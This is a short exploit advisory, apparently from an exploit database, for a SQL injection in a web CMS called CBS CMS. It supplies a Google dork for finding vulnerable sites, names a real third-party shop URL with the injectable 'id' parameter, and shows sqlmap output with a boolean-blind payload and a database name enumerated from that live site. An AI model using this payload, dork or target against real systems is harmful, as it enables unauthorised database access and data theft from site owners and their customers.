#Exploit Title: CBS CMS SQL Injection Vulnerability
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: cbstech.in
#Google Dork: " Developed By CBS"
#Category: webapps
#Tested On: windows 10, Firefox
SQL Injection
Demo: https://bazaarmantri.com/product.php?id=40024[SQL Injection Vulnerability]
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=40024 AND 1008=1008
Vector: AND [INFERENCE]
back-end DBMS: MySQL >= 5.0.0
available databases :
[*] eazaar6n_nbntri
*********************************************************
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************